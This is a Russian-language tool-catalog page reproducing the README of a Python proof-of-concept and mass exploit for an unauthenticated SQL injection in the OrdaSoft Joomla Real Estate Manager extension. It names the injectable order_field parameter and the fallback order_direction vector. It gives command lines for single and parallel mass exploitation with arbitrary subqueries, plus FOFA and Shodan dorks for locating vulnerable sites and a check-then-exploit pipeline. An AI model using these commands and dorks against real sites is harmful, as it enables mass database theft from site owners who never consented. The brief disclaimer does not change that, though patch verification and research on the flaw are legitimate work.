Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-100752 — Python 3 PoC и массовый эксплойт для CVE-2026-100752 — неаутентифицированная SQL-инъекция в OrdaSoft Joomla Real Estate Manager <=6.7.8 через параметр order_field в ORDER BY. | Kitploit
Инструменты/GitHubGitHub/murrez/cve-2026-100752
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubmurrez/cve-2026-100752

CVE-2026-100752

Python 3 PoC и массовый эксплойт для CVE-2026-100752 — неаутентифицированная SQL-инъекция в OrdaSoft Joomla Real Estate Manager <=6.7.8 через параметр order_field в ORDER BY.

4 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
Поделиться

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free), неаутентифицированная SQL-инъекция

Python 3 PoC для CVE-2026-100752 — расширение Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. Исправлено в 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Каталогhttps://pocbit.org/pocs/
Компонентcom_realestatemanager
Файлsite/realestatemanager.php
Параметрorder_field → ORDER BY (без кавычек, без allow-list)
АутентификацияНе требуется (публичный список / поиск / просмотр категорий)
CWECWE-89 SQL Injection
ТакжеУстаревшая инъекция через POST-параметр order_direction (Metasploit / аудиты до 6.7.9)

Вывод PoC (скриншот)

Цветной баннер PoCbit, затем JSON-вывод --mode exploit: exploited: true, вектор order_field_get, маршрут showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Пример команды:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Скриншот получен в авторизованной тестовой среде; целевой URL предназначен для проверки PoC.)


Краткое описание уязвимости

Real Estate Manager (Free) — это расширение OrdaSoft для управления объявлениями о недвижимости на Joomla. В версиях 6.7.8 и более ранних параметр запроса order_field в файле site/realestatemanager.php напрямую подставляется в предложение ORDER BY; отсутствует allow-list столбцов, экранирование или приведение типов. Без аутентификации могут быть эксплуатированы запросы при просмотре категорий, результатах поиска и полном списке объявлений.

При успешной SQLi следует оценить риск чтения из базы данных (версия, хэши пользователей, данные сайта), записи/удаления в зависимости от привилегий и цепочки до RCE. Обновитесь до версии 6.7.9 или выше (OrdaSoft security release).


Технический механизм

Фронт-контроллер Joomla:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field управляет столбцом/выражением ORDER BY. Значения, такие как подзапросы на основе ошибок, могут быть внедрены, поскольку значение конкатенируется в SQL без привязки или валидации.

Затронутые контексты запросов (согласно тексту CVE):

  1. Просмотр категорий (showCategory и связанные)
  2. Результаты поиска
  3. Полный список объектов недвижимости

Данный PoC:

  • Определяет com_realestatemanager (пути + опциональная версия из манифеста)
  • Извлекает catid / Itemid из HTML сайта
  • Проверяет задачи: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Основное: order_field на основе ошибок GET и POST
  • Резервное: order_direction=asc,<injection> (исторический вектор, всё ещё полезен на некоторых сборках)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (строки с успешной утечкой SELECT)

Требования

cd CVE-2026-100752
pip install -r requirements.txt

Использование

Одна цель — проверка

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive пытается выполнить SELECT VERSION(), когда boolean/error-доказательство неубедительно.

Одна цель — эксплуатация

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Массовая обработка

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
ФлагНазначение
--mode exploitИзвлечение данных на основе ошибок (поддерживается массово)
--subqueryВнутренний SQL для двойного запроса CONCAT(0x7e, …)
--vectorПринудительно order_field_get, order_field_post или order_direction_post
-jПараллельные цели
--no-colorПростой терминал

JSONL включает pocbit, pocbit_catalog, pocbit_page, cve, component.


Дорки FOFA / поиска активов

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

В стиле Shodan (если поддерживается): http.html:com_realestatemanager

Экспортируйте имена хостов в targets.txt (по одному URL на строку), затем выполняйте check → hits → exploit только на авторизованных объектах.


Определение версии

Манифест (если доступен):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Если версия ≤ 6.7.8 → likely_vulnerable_version. Если ≥ 6.7.9 → patched_version (эксплуатация всё ещё может не удаться).


Связанные CVE (та же серия релизов)

CVEТипИсправлено
CVE-2026-100752Неаутентифицированная SQLi (order_field)6.7.9
CVE-2026-100753Отражённый XSS (публичные просмотры объектов)6.7.9

Тот же пакет от вендора (сентябрь 2026): Vehicle Manager и другие расширения OrdaSoft получили отдельные CVE — пропатчьте все используемые компоненты OrdaSoft.


Ссылки

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — шесть уязвимостей в трёх расширениях OrdaSoft (сентябрь 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (устаревший POST order_direction)

Правовая информация

Только авторизованное тестирование безопасности и проверка патчей. Не используйте против систем без разрешения.


Описание репозитория GitHub

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Скачать инструмент